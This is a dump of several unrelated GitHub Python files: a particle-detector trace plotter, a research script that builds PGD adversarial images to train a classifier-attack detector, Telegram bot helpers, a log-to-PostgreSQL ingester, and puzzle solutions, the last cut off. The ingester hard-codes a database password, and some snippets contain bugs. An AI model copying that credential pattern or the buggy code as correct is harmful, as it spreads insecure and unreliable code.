rt\n\n\n'''\n\n#######################################\n# PLOTTING TRACES OF GRAND DATA FILES #\n#######################################\n\nGRANDLIB BRANCH: `dev_io_root`\n\nThis script reads out a GRAND data file in ROOT format.\nIt loops over the events in the file, plotting each of the ADC traces\nin an interactive way. This allows us to take a quick look at traces,\nparticularly during on-site analyses.\n\n'''\n\n##############################\n# SET CUSTOM PLOT PARAMETERS #\n##############################\n\nplt.rcParams.update({'axes.labelsize': 30})\nplt.rcParams.update({'xtick.labelsize': 26})\nplt.rcParams.update({'ytick.labelsize': 26})\nplt.rcParams.update({'axes.titlesize': 10})\nplt.rcParams.update({'legend.fontsize': 20})\n\n\n###########################\n# DEFINE PARSER ARGUMENTS #\n###########################\n\nparser = argparse.ArgumentParser(description=\"Plot ADC traces of GRAND events.\")\n\nparser.add_argument('--path',\n dest='path_to_data_file',\n default='/sps/grand/data/gp13/may2023/20dB/ROOTfiles/GRAND.TEST-RAW-10s-ChanXYZ-20dB-14dus.20230520125419.001_dat.root',\n type=str,\n help='Specifies the path of the ROOT data file containing the\\\n traces to plot.')\n\nparser.add_argument('--time_sleep',\n dest='time_sleep',\n default=1,\n type=float,\n help='Specifies the sleep time between plotting traces of each entry.')\n\nparser.add_argument('--start_entry',\n dest='start_entry',\n default=0,\n type=int,\n help='Entry of ROOT tree from where to start the plotting')\n\nparser.add_argument('--sigma',\n dest='sigma',\n default=0,\n type=int,\n help='If sigma>0 plot lines of sigma*std.')\n\nparser.add_argument(\"--savefig\",\n dest=\"savefig\",\n action='store_true',\n help=\"Save plots in `../plots/` directory.\")\nparser.set_defaults(savefig=False)\n\nparse_args = parser.parse_args()\n\npath_to_data_file = parse_args.path_to_data_file\ntime_sleep = parse_args.time_sleep\nstart_entry = parse_args.start_entry\nsigma = parse_args.sigma\nsavefig = parse_args.savefig\n\n\n###################################\n# READ DATA FILE AND OBTAIN TREES #\n###################################\n\nif not os.path.exists(path_to_data_file):\n raise Exception('File not found:',path_to_data_file)\n\ndata_file = path_to_data_file.split('/')[-1]\n\n\n# Initiate TADC tree\ndf = rt.DataFile(path_to_data_file)\ntadc = df.tadc\n#tadc = rt.TADC(path_to_data_file)\n\n\n###################\n# PLOT THE TRACES #\n###################\n\n# Idea is to create figure before loop, and redraw at each iteration\n\n# Activate interactive mode\nplt.ion()\n\n# Create figure\nfig, ax = plt.subplots(3,1,sharex=True,figsize=(10,8))\n\n# Get first TADC entry\ntadc.get_entry(0)\n\n# Depending on how you take data, not all ADC channels are the same.\n# For GP13 data of March: X, Y, Z correspond to channels 1, 2, 3\n# For Nancay data of May: X, Y, Z correspond to channels 0, 1, 2\nchannels = [1,2,3]\nif tadc.trace_ch[0][3] == []: \n channels = [0,1,2]\n\nlabels = ['Channel {:}'.format(channel) for channel in channels]\n\n# Create plt.plot instances\nplt_0, = ax[0].plot(tadc.trace_ch[0][channels[0]],label=labels[0],color='b')\nplt_1, = ax[1].plot(tadc.trace_ch[0][channels[1]],label=labels[1],color='m')\nplt_2, = ax[2].plot(tadc.trace_ch[0][channels[2]],label=labels[2],color='r')\n\n# Create plt.hline instances\nif sigma > 0:\n label = '$\\pm {}\\sigma$'.format(sigma)\n hline_0_plus = ax[0].axhline(color='k',linewidth=2,linestyle='--',label=label)\n hline_1_plus = ax[1].axhline(color='k',linewidth=2,linestyle='--',label=label)\n hline_2_plus = ax[2].axhline(color='k',linewidth=2,linestyle='--',label=label)\n\n hline_0_minus = ax[0].axhline(color='k',linewidth=2,linestyle='--')\n hline_1_minus = ax[1].axhline(color='k',linewidth=2,linestyle='--')\n hline_2_minus = ax[2].axhline(color='k',linewidth=2,linestyle='--')\n\n# Set axis labels\nax[2].set_xlabel('Sample number',fontsize=20)\nax[1].set_ylabel('ADC counts [LSB]',fontsize=20)\n\n# Set figure legends\nax[0].legend(frameon=True)\nax[1].legend(frameon=True)\nax[2].legend(frameon=True)\n\nfor entry in range(tadc.get_number_of_entries())[start_entry:]:\n print(entry)\n\n # Load the entry in the tree\n tadc.get_entry(entry)\n\n # Get the traces\n trace_0 = tadc.trace_ch[0][channels[0]]\n trace_1 = tadc.trace_ch[0][channels[1]]\n trace_2 = tadc.trace_ch[0][channels[2]]\n\n # Get the STD of the traces\n std_0 = np.std(trace_0)\n std_1 = np.std(trace_1)\n std_2 = np.std(trace_2)\n\n # Plot the traces in X=NS, Y=EW, Z=UP\n plt_0.set_ydata(trace_0)\n plt_1.set_ydata(trace_1)\n plt_2.set_ydata(trace_2)\n\n if sigma > 0:\n hline_0_plus.set_ydata(sigma*std_0)\n hline_1_plus.set_ydata(sigma*std_1)\n hline_2_plus.set_ydata(sigma*std_2)\n\n hline_0_minus.set_ydata(-sigma*std_0)\n hline_1_minus.set_ydata(-sigma*std_1)\n hline_2_minus.set_ydata(-sigma*std_2)\n\n # Rescale y axes\n # ylim_0 = [np.min(trace_0) - 20, np.max(trace_0) + 20]\n # ylim_1 = [np.min(trace_1) - 20, np.max(trace_1) + 20]\n # ylim_2 = [np.min(trace_2) - 20, np.max(trace_2) + 20]\n\n if sigma < 5.5:\n lim = 7.5\n else:\n lim = sigma + 0.5\n\n ylim_0 = [-lim*std_0, lim*std_0]\n ylim_1 = [-lim*std_1, lim*std_1]\n ylim_2 = [-lim*std_2, lim*std_2]\n\n ax[0].set_ylim(ylim_0)\n ax[1].set_ylim(ylim_1)\n ax[2].set_ylim(ylim_2)\n\n # Set figure title\n title = r'File: {:} | Entry: {:} | Event index: {:} | DU: {:}'\n title = title.format(data_file,entry,tadc.event_id[0],tadc.du_id[0])\n ax[0].set_title(title)\n\n # Draw figure\n fig.canvas.draw()\n\n # Save figure if specified\n if savefig:\n plot_dir = '/pbs/home/p/pcorrea/GRAND/plots/traces/'\n extension = '_entry_{}.png'.format(entry)\n plot_file = data_file.replace('.root',extension)\n plt.savefig(plot_dir+plot_file,bbox_inches='tight',dpi=150)\n print('Saved figure at',plot_dir+plot_file)\n\n # Flush events for next iterations\n fig.canvas.flush_events()\n \n # Sleep for some time to show the figure\n time.sleep(time_sleep)\n\n'''\n#################\n# END OF SCRIPT #\n#################\n'''","repo_name":"pcorcam/grand-data-analysis","sub_path":"plot_traces.py","file_name":"plot_traces.py","file_ext":"py","file_size_in_byte":6626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74568907768","text":"## @package AdversarialDetection\r\n# \r\nimport sys\r\nimport os\r\nimport argparse\r\nimport numpy as np\r\nimport torch\r\nimport csv\r\nfrom torchvision import utils\r\nfrom Model.CNN import CNN\r\nfrom Model.Reconstructor import Reconstructor\r\nfrom Model.Detector import Detector\r\nfrom Model.Adversary import Adversary\r\nfrom Model.MetaCNN import MetaCNN\r\n\r\nfrom Utility.Data import Data\r\nfrom Utility.ProgressBar import ProgressBar\r\n\r\n##\r\n# @brief\r\n# Application Entry\r\n#\r\n# @details\r\n# @par\r\n# This method is the application entry point.\r\ndef Main( ):\r\n print( \"Parsing Arguments\" )\r\n parser = argparse.ArgumentParser( description = \"CPSC-597\" )\r\n parser.add_argument( '--dataset', type = str, default = 'mnist', choices = [ 'mnist', 'cifar10' ] )\r\n parser.add_argument( '--data_path', type = str, required = True, help = 'Path to dataset' )\r\n parser.add_argument( '--batch_size', type = int, default = 64, help = 'Size of a batch' )\r\n parser.add_argument( '--mode', type = str, default = 'cnn', choices = [ 'cnn', 'recon', 'detect', 'test', 'adversary' ] )\r\n parser.add_argument( '--epochs', type = int, default = 50, help = 'The number of epochs to run')\r\n parser.add_argument( '--epsilon', type = float, default = 0.1, help = 'Perturbed image pixel adjustment factor' )\r\n parser.add_argument( '--cuda', type = str, default = 'True', help = 'Availability of cuda' )\r\n parser.add_argument( '--cnn', type = str, default = 'cnn.state', help = 'Path to CNN Model State' )\r\n parser.add_argument( '--recon', type = str, default = 'recon.state', help = 'Path to Reconstructor Model State' )\r\n parser.add_argument( '--detect', type = str, default = 'detect.state', help = 'Path to Detector Model State' )\r\n args = parser.parse_args( )\r\n\r\n print( \"Creating Dataloader\" )\r\n data = Data( args.dataset, args.data_path, args.batch_size )\r\n\r\n print( \"Creating Models\" )\r\n cnn = CNN( data.channels, args.cuda )\r\n recon = Reconstructor( data.channels, args.cuda )\r\n detect = Detector( data.channels * 4, args.cuda )\r\n meta = MetaCNN( data.channels, args )\r\n\r\n if( os.path.exists( args.cnn ) ):\r\n print( \"Loading CNN state\" )\r\n cnn.Load( args.cnn )\r\n if( os.path.exists( args.recon ) ):\r\n print( \"Loading Reconstructor state\" )\r\n recon.Load( args.recon )\r\n if( os.path.exists( args.detect ) ):\r\n print( \"Loading Detector state\" )\r\n detect.Load( args.detect )\r\n\r\n adversary = Adversary( cnn )\r\n\r\n if( args.mode == 'cnn' ):\r\n cnn.Train( data.train_loader, args.epochs, args.batch_size )\r\n acc = cnn.Test( data.test_loader, args.batch_size )\r\n if( acc > cnn.accuracy ):\r\n Save( cnn, acc, cnn.epochs + args.epochs, args.cnn )\r\n elif( args.mode == 'recon' ):\r\n recon.Train( cnn, data.train_loader, args.epochs, args.batch_size )\r\n Save( recon, 0, recon.epochs + recon.epochs, args.recon )\r\n elif( args.mode == 'detect' ):\r\n successLoader = adversary.CreateSuccessLoader( 'cuda', data.train_loader )\r\n advloader, results = adversary.PGDAttack( \"cuda\", successLoader, args.epsilon, args.epsilon / 10.0, 10, -1, 1, False )\r\n metaloader = adversary.CreateDetectorLoader( cnn, recon, successLoader, advloader )\r\n detect.Train( metaloader, args.epochs, args.batch_size )\r\n\r\n successLoader = adversary.CreateSuccessLoader( 'cuda', data.test_loader )\r\n advloader, results = adversary.PGDAttack( \"cuda\", successLoader, args.epsilon, args.epsilon / 10.0, 10, -1, 1, False )\r\n metaloader = adversary.CreateDetectorLoader( cnn, recon, data.test_loader, advloader )\r\n acc = detect.Test( metaloader, args.batch_size )\r\n if( acc > detect.accuracy ):\r\n Save( detect, acc, detect.epochs + args.epochs, args.detect )\r\n elif( args.mode == 'test' ):\r\n successLoader = adversary.CreateSuccessLoader( 'cuda', data.test_loader )\r\n advloader, results = adversary.PGDAttack( \"cuda\", successLoader, args.epsilon, args.epsilon / 10.0, 10, -1, 1, False )\r\n metaloader = adversary.CreateMetaLoader( data.test_loader, advloader )\r\n acc = meta.Test( metaloader, args.batch_size )\r\n\r\n elif( args.mode == 'adversary' ):\r\n labelStr = [ 'airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck' ]\r\n cnn.eval( )\r\n recon.eval( )\r\n accuracies = []\r\n \r\n successLoader = adversary.CreateSuccessLoader( 'cuda', data.test_loader )\r\n accuracies.append( cnn.Test( successLoader, args.batch_size ) )\r\n print( \"Generating Adversarial Images\" )\r\n advloader, results = adversary.PGDAttack( \"cuda\", successLoader, args.epsilon, args.epsilon / 10.0, 10, -1, 1, False )\r\n print( \"Evaluating Adversarial Images\" )\r\n accuracies.append( cnn.Test( advloader, args.batch_size ) )\r\n\r\n print( \"Saving Adversarial Image Examples\" )\r\n # 0, 1, 2, 3, 4, 5, 6, 7, 8, 9\r\n examples = [ ]\r\n for i in range( len( labelStr ) ):\r\n examples.append( { 'total' : 0, 'cl1' : 0, 'cl2' : 0, 'cl3' : 0 } )\r\n \r\n progress = ProgressBar( 40, 80 )\r\n for batchIndex in range( len( results ) ):\r\n labelBatch = results[ batchIndex ][ 'label' ] \r\n originalBatch = results[ batchIndex ][ 'orig' ]\r\n originalOut = cnn( originalBatch.cuda( ) )\r\n originalPred = originalOut.max( 1, keepdim = True )[ 1 ]\r\n adversaryBatch = results[ batchIndex ][ 'adv' ]\r\n adversaryOut = cnn( adversaryBatch.cuda( ) )\r\n adversaryPred = adversaryOut.max( 1, keepdim = True )[ 1 ]\r\n \r\n for i in range( len( adversaryOut ) ):\r\n # If the Adversary prediction does not equal the correct label and the example count for the label is less than 100 \r\n if( ( adversaryPred[ i ] != labelBatch[ i ] ) and ( examples[ labelBatch[ i ] ][ 'total' ] < 100 ) ):\r\n examples[ labelBatch[ i ] ][ 'total' ] += 1\r\n \r\n # Obtain the reconstructed image for the original and adversarial inputs after convolutional layers 1, 2, and 3\r\n orig1, orig2, orig3 = recon( { 'model' : cnn, 'input' : originalBatch[ i ].unsqueeze( 0 ).cuda( ) } )\r\n advs1, advs2, advs3 = recon( { 'model' : cnn, 'input' : adversaryBatch[ i ].unsqueeze( 0 ).cuda( ) } )\r\n\r\n # Obtain the classification for the original and adversarial inputs after convolutional layers 1, 2, and 3\r\n corig1, corig2, corig3 = classifier( { 'model' : cnn, 'input' : originalBatch[ i ].unsqueeze( 0 ).cuda( ) } )\r\n cadvs1, cadvs2, cadvs3 = classifier( { 'model' : cnn, 'input' : adversaryBatch[ i ].unsqueeze( 0 ).cuda( ) } )\r\n \r\n if( cadvs1.max( 1, keepdim = True )[ 1 ] != corig1.max( 1, keepdim = True )[ 1 ] ):\r\n examples[ labelBatch[ i ] ][ 'cl1' ] += 1\r\n elif( cadvs2.max( 1, keepdim = True )[ 1 ] != corig2.max( 1, keepdim = True )[ 1 ] ):\r\n examples[ labelBatch[ i ] ][ 'cl2' ] += 1\r\n elif( cadvs3.max( 1, keepdim = True )[ 1 ] != corig3.max( 1, keepdim = True )[ 1 ] ):\r\n examples[ labelBatch[ i ] ][ 'cl3' ] += 1\r\n \r\n # Ensure folder exists to store example images\r\n folder = 'Images/Epsilon{}/'.format( args.epsilon )\r\n if( not os.path.exists( folder ) ):\r\n os.mkdir( folder )\r\n folder = os.path.join( folder, labelStr[ labelBatch[ i ] ] )\r\n if( not os.path.exists( folder ) ):\r\n os.mkdir( folder )\r\n \r\n # Save the original, adversarial, reconstructed, and delta images\r\n utils.save_image( originalBatch[ i ], os.path.join( folder, 'Example{}-O.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n utils.save_image( adversaryBatch[ i ], os.path.join( folder, 'Example{}-A.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n utils.save_image( orig1, os.path.join( folder, 'Example{}-O-CL1-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ corig1.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( orig2, os.path.join( folder, 'Example{}-O-CL2-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ corig2.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( orig3, os.path.join( folder, 'Example{}-O-CL3-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ corig3.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( advs1, os.path.join( folder, 'Example{}-A-CL1-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ cadvs1.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( advs2, os.path.join( folder, 'Example{}-A-CL2-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ cadvs2.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( advs3, os.path.join( folder, 'Example{}-A-CL3-{}.png'.format( examples[ labelBatch[ i ] ][ 'total' ], labelStr[ cadvs3.max( 1 )[ 1 ] ] ) ) )\r\n utils.save_image( advs1 - orig1, os.path.join( folder, 'Example{}-D-CL1.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n utils.save_image( advs2 - orig2, os.path.join( folder, 'Example{}-D-CL2.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n utils.save_image( advs3 - orig3, os.path.join( folder, 'Example{}-D-CL3.png'.format( examples[ labelBatch[ i ] ][ 'total' ] ) ) )\r\n \r\n filename = os.path.join( folder, 'classification.csv' )\r\n if( not os.path.exists( filename ) ):\r\n with open( filename, 'w', newline='' ) as csvfile:\r\n csvWriter = csv.writer( csvfile, delimiter = ',', quotechar = '|', quoting = csv.QUOTE_MINIMAL )\r\n csvWriter.writerow( [ 'OL1', 'OL2', 'OL3', 'AL1', 'AL2', 'AL3' ] )\r\n \r\n with open( filename, 'a+', newline='' ) as csvfile:\r\n csvWriter = csv.writer( csvfile, delimiter = ',', quotechar = '|', quoting = csv.QUOTE_MINIMAL )\r\n csvWriter.writerow( [ labelStr[ corig1.max( 1, keepdim = True )[ 1 ] ], labelStr[ corig2.max( 1, keepdim = True )[ 1 ] ], labelStr[ corig3.max( 1, keepdim = True )[ 1 ] ], \r\n labelStr[ cadvs1.max( 1, keepdim = True )[ 1 ] ], labelStr[ cadvs2.max( 1, keepdim = True )[ 1 ] ], labelStr[ cadvs3.max( 1, keepdim = True )[ 1 ] ] ] )\r\n # Update Progress\r\n progress.Update( batchIndex, len( results ), '' )\r\n with open( \"Images/Epsilon{}/Statistics.csv\".format( args.epsilon ), 'w', newline='' ) as csvfile:\r\n csvWriter = csv.writer( csvfile, delimiter = ',', quotechar = '|', quoting = csv.QUOTE_MINIMAL )\r\n csvWriter.writerow( [ 'label', 'Total Examples', 'CL1 Mismatch', 'CL2 Mismatch', 'CL3 Mismatch' ] )\r\n for i in range( len( examples ) ):\r\n csvWriter.writerow( [ labelStr[ i ], examples[ i ][ 'total' ], examples[ i ][ 'cl1' ], examples[ i ][ 'cl2' ], examples[ i ][ 'cl3' ] ] )\r\n\r\n##\r\n# @brief\r\n# Save Model State\r\n#\r\n# @details\r\n# This method saves the given model state as well as records the accuracy and number epochs run to the path provided.\r\n#\r\n# @param model CNN Model\r\n# @param acc Model evaluation accuracy\r\n# @param epoch Number of epochs performed\r\n# @param path File path\r\ndef Save( model, acc, epoch, path ):\r\n print( 'Saving...' )\r\n state = {\r\n 'model': model.state_dict( ),\r\n 'acc': acc,\r\n 'epoch': epoch,\r\n }\r\n torch.save( state, path )\r\n print( 'Save complete.' )\r\n\r\nif __name__ == \"__main__\":\r\n sys.exit( int( Main( ) or 0 ) )\r\n \r\n","repo_name":"bergermeister/CPSC-597","sub_path":"AdversarialDetection/AdversarialDetection.py","file_name":"AdversarialDetection.py","file_ext":"py","file_size_in_byte":11895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42823709832","text":"from aiogram import types\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom aiogram.dispatcher import FSMContext\n\nfrom ...db.models import User\nfrom ...db.utils import get_tasks_for_user\nfrom ..utils.general_utils import res_dict, generate_inline_keyboard_for_tasks\n\n\ndef generate_reply_keyboard_for_tasks_start():\n keyboard = InlineKeyboardMarkup()\n keyboard.insert(InlineKeyboardButton('Отмена', callback_data='cancel'))\n return keyboard\n\n\ndef generate_reply_keyboard_for_tasks():\n keyboard = InlineKeyboardMarkup()\n keyboard.add(InlineKeyboardButton('Назад', callback_data='back'))\n keyboard.insert(InlineKeyboardButton('Отмена', callback_data='cancel'))\n return keyboard\n\n\ndef generate_reply_keyboard_for_tasks_done():\n keyboard = InlineKeyboardMarkup()\n keyboard.add(InlineKeyboardButton('Назад', callback_data='back'))\n keyboard.insert(InlineKeyboardButton('Отмена', callback_data='cancel'))\n keyboard.insert(InlineKeyboardButton('Подтверждаю', callback_data='done'))\n return keyboard\n\n\n# ☑️ ☐\nasync def generate_reply_keyboard_for_tasks_spheres(state: FSMContext):\n keyboard = InlineKeyboardMarkup()\n even = True\n async with state.proxy() as data:\n spheres = data['spheres']\n for key, sphere in spheres.items():\n checked = \"☑️ \" if sphere else '☐ ' # TODO поискать другие эмодзи\n if even:\n keyboard.add(InlineKeyboardButton(checked + key, callback_data=key))\n else:\n keyboard.insert(InlineKeyboardButton(checked + key, callback_data=key))\n even = not even\n keyboard.add(InlineKeyboardButton('Назад', callback_data='back'))\n keyboard.insert(InlineKeyboardButton('Отмена', callback_data='cancel'))\n keyboard.insert(InlineKeyboardButton('Подтвердить', callback_data='done'))\n return keyboard\n\n\nasync def send_profile(db_user: User, message: types.Message):\n to_send = res_dict['profile_representative'].format(db_user.real_fullname, db_user.phone_n,\n len(get_tasks_for_user(db_user, (\n 'awaiting_confirmation', 'awaiting_specialist',\n 'in_work'))),\n len(get_tasks_for_user(db_user, (\n 'closed_with_success', 'canceled_by_represented',\n 'closed_by_other_reason'))))\n keyboard = InlineKeyboardMarkup()\n keyboard.insert(InlineKeyboardButton('Редактировать', callback_data='edit_profile'))\n await message.answer(to_send, parse_mode='html', reply_markup=keyboard)\n\n\n# async def generate_inline_keyboard_for_tasks(state: FSMContext, page_n: int, type_: str):\n# async with state.proxy() as state_data:\n# tasks_list = state_data[f'tasks_{type_}']\n# if page_n * 9 > len(tasks_list):\n# return False\n# else:\n# reply_markup = types.InlineKeyboardMarkup()\n# for index, task in enumerate(tasks_list[page_n * 9:(page_n + 1) * 9]):\n# callback_data_to_input = f\"task_info {task.id} {page_n} {type_}\"\n# reply_markup.add(types.InlineKeyboardButton(f\"{page_n * 9 + (index + 1)}. {task.name}\"[:60],\n# callback_data=callback_data_to_input))\n# reply_markup.row()\n# # cp_history - change page in history\n# if page_n != 0:\n# reply_markup.insert(types.InlineKeyboardButton(\"<<\", callback_data=f'cp_tasks {page_n - 1} {type_}'))\n# if (page_n + 1) * 9 < len(tasks_list):\n# reply_markup.insert(types.InlineKeyboardButton(\">>\", callback_data=f'cp_tasks {page_n + 1} {type_}'))\n# return reply_markup\n\n\nasync def tasks_history(db_user: User, message: types.Message, state: FSMContext):\n tasks = get_tasks_for_user(db_user, ('closed_with_success', 'canceled_by_represented', 'closed_by_other_reason'))\n if tasks:\n async with state.proxy() as state_data:\n state_data['tasks_history'] = tasks\n await message.answer('История задач, которые Вы добавляли. \\nЧтобы получить больше информации, нажмите на '\n 'задачу.',\n parse_mode='html',\n reply_markup=await generate_inline_keyboard_for_tasks(state, 0, 'history'))\n else:\n await message.answer('На данный момент вы не добавили ни одной задачи', )\n\n\nasync def tasks_current(db_user: User, message: types.Message, state: FSMContext):\n tasks = get_tasks_for_user(db_user, ('awaiting_confirmation', 'awaiting_specialist', 'in_work'))\n if tasks:\n async with state.proxy() as state_data:\n state_data['tasks_current'] = tasks\n await message.answer(\n 'Текущие задачи, которые Вы добавляли. \\nЧтобы получить больше информации и редактировать, нажмите на '\n 'задачу.',\n parse_mode='html', reply_markup=await generate_inline_keyboard_for_tasks(state, 0, 'current'))\n else:\n await message.answer('На данный момент вы не добавляли какие-либо задачи, чтобы получить задание, зайдите в '\n 'меню \"Список доступных задач\"')\n","repo_name":"tainella/Digitalyouth_ITbound_Bot","sub_path":"app/bot/utils/representative_utils.py","file_name":"representative_utils.py","file_ext":"py","file_size_in_byte":5767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40294488505","text":"import re\r\nimport psycopg2\r\n\r\n# Database connection details\r\ndb_host = 'localhost'\r\ndb_name = 'konark'\r\ndb_user = 'postgres'\r\ndb_password = 't@rHB123'\r\n\r\n# Connect to the PostgreSQL database\r\ntry:\r\n conn = psycopg2.connect(\r\n host=db_host,\r\n database=db_name,\r\n user=db_user,\r\n password=db_password\r\n )\r\n cursor = conn.cursor()\r\nexcept (Exception, psycopg2.Error) as error:\r\n print(\"Error while connecting to PostgreSQL:\", error)\r\n exit()\r\n\r\n# Regular expressions for log line parsing\r\napache_log_regex = re.compile(r'^(\\S+)\\s+\\S+\\s+(\\S+)\\s+\\[(.*?)\\]\\s+\"(\\S+)\\s+(\\S+)\\s+HTTP/\\d\\.\\d\"\\s+(\\d+)\\s+(\\d+)\\s+\"([^\"]+)\"')\r\nexim4_log_regex = re.compile(r'^(\\S+)\\s+\\S+\\s+(\\S+)\\s+<([^>]+)>\\s+.*\\s+id=.*\\s+(.*):\\s+(.*);\\s+(.*)')\r\n\r\n# Log file paths\r\napache_log_file = r'insert path here'\r\nexim4_log_file = r'insert path here'\r\n\r\n# Function to insert Apache log entries into the database\r\ndef insert_apache_log_entry(log_entry):\r\n query = \"INSERT INTO apache_logs (remote_host, timestamp, request_method, requested_url, http_status_code, bytes_transferred, user_agent) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\r\n try:\r\n cursor.execute(query, log_entry)\r\n except (Exception, psycopg2.Error) as error:\r\n print(\"Error while inserting Apache log entry:\", error)\r\n raise\r\n\r\n# Function to insert Exim4 log entries into the database\r\ndef insert_exim4_log_entry(log_entry):\r\n query = \"INSERT INTO exim4_logs (timestamp, sender, recipient, message, status, error_message) VALUES (%s, %s, %s, %s, %s, %s)\"\r\n try:\r\n cursor.execute(query, log_entry)\r\n except (Exception, psycopg2.Error) as error:\r\n print(\"Error while inserting Exim4 log entry:\", error)\r\n raise\r\n\r\n# Read and parse Apache log file\r\ntry:\r\n with open(apache_log_file, 'r') as file:\r\n for line in file:\r\n match = apache_log_regex.match(line)\r\n if match:\r\n log_entry = match.groups()\r\n insert_apache_log_entry(log_entry)\r\nexcept FileNotFoundError as error:\r\n print(\"Error while reading Apache log file:\", error)\r\n exit()\r\n\r\n# Read and parse Exim4 log file\r\ntry:\r\n with open(exim4_log_file, 'r') as file:\r\n for line in file:\r\n match = exim4_log_regex.match(line)\r\n if match:\r\n log_entry = match.groups()\r\n insert_exim4_log_entry(log_entry)\r\nexcept FileNotFoundError as error:\r\n print(\"Error while reading Exim4 log file:\", error)\r\n exit()\r\n\r\n# Commit the changes and close the database connection\r\ntry:\r\n conn.commit()\r\n print(\"Log entries inserted into the database.\")\r\nexcept (Exception, psycopg2.Error) as error:\r\n print(\"Error while committing changes to the database:\", error)\r\n# The result of executing this code is\r\n# lilyi/OneDrive/Documents/GitHub/bharatc12.github.io/ingest script.py\"\r\n# Log entries inserted into the database.\r\nconn.close()\r\n\r\n","repo_name":"bharatc12/konark","sub_path":"ingest script.py","file_name":"ingest script.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34724536898","text":"def front(a):\n front = a\n front = front.replace('2', 'x').replace('3', '2').replace('x', '3')\n return front\n\ndef behind(a):\n behind = a\n behind = behind.replace('1', 'x').replace('2', '1').replace('x', '2')\n return behind\n\nN = int(input())\n\nans = \"1 3\"\n\nfor i in range(N - 1):\n ans = front(ans) + \"1 3\" + behind(ans)\n\nprint(2 ** N - 1)\nfor i in range(0, len(ans), 3):\n print(ans[i:i + 3])\n\n# def hanoi_tower(n, source, auxiliary, target):\n# if n == 1:\n# print(source, target)\n# else:\n# hanoi_tower(n - 1, source, target, auxiliary)\n# print(source, target)\n# hanoi_tower(n - 1, auxiliary, source, target)\n\n# N = int(input())\n# total_moves = 2**N - 1\n# print(total_moves)\n\n# hanoi_tower(N, 1, 2, 3)","repo_name":"hjh3229/algorithm","sub_path":"src/baekjoon/sort/bj_11729.py","file_name":"bj_11729.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21601484875","text":"from copy import deepcopy\n\nt = int(input())\nans = []\nfor _ in range(t):\n n = int(input())\n dic = {}\n for i in range(n):\n print(dic)\n pname = input()\n m, *ingrid = input().split()\n singrid = set(ingrid)\n j, *engrid = input().split()\n sengrid = set(engrid)\n for grid in ingrid:\n if grid in dic:\n dic[grid] = dic[grid] & sengrid\n else:\n dic[grid] = deepcopy(sengrid)\n for key in dic.keys():\n if key not in singrid:\n dic[key] = dic[grid] - sengrid\n at = []\n for i in dic.keys():\n for j in dic[i]:\n at.append([i,j])\n ans.append(at)\nprint(\"\\n\".join(\"\\n\".join(\"(\"+i[0]+\", \"+i[1]+\")\" for i in j) for j in ans))","repo_name":"Programmerryoki/Competitive-Programming","sub_path":"Kattis Problems/Problems/Pizza Hawaii.py","file_name":"Pizza Hawaii.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43372690528","text":"# You are given a binary string s consisting only of zeroes and ones.\n# A substring of s is considered balanced if all zeroes are before ones and the number\n# of zeroes is equal to the number of ones inside the substring.\n# Notice that the empty substring is considered a balanced substring.\n# Return the length of the longest balanced substring of s.\n# A substring is a contiguous sequence of characters within a string.\n# --------------------\n# 1 <= s.length <= 50\n# '0' <= s[i] <= '1'\n\n\ndef find_the_longest(s: str) -> int:\n # working_sol (85.05%, 95.36%) -> (47ms, 16.19mb) time: O(n) | space: O(1)\n # All pairs.\n all_count: int = 0\n # Zeroes to build pair with.\n count_zeroes: int = 0\n # Current index of input_s.\n index: int = 0\n while index != len(s):\n # Count '0' and move on.\n if s[index] == '0':\n count_zeroes += 1\n index += 1\n continue\n # We can start counting pairs.\n if s[index] == '1':\n # There's no '0' pair to build with.\n if count_zeroes == 0:\n index += 1\n continue\n # Current substring size.\n current_count: int = 0\n # If there's '0' left, we can try to build a pair.\n while count_zeroes != 0:\n current_count += 1\n index += 1\n # All array is used or reset of zeroes_count.\n if index == len(s) or s[index] != '1':\n count_zeroes = 0\n break\n count_zeroes -= 1\n # We need maximum correct substring.\n all_count = max(current_count, all_count)\n return all_count * 2\n\n\n# Time complexity: O(n) -> traversing input_array, once => O(n).\n# Auxiliary space: O(1) -> only 4 constant INTs used, none of them depends on input => O(1).\n# --------------------\n# Should be just counter with start from 0 and breaking when more than count(0) one's(1) met.\n\n\ntest: str = \"01000111\"\ntest_out: int = 6\nassert test_out == find_the_longest(test)\n\ntest = \"00111\"\ntest_out = 4\nassert test_out == find_the_longest(test)\n\ntest = \"111\"\ntest_out = 0\nassert test_out == find_the_longest(test)\n\ntest = \"001\"\ntest_out = 1\nassert test_out == 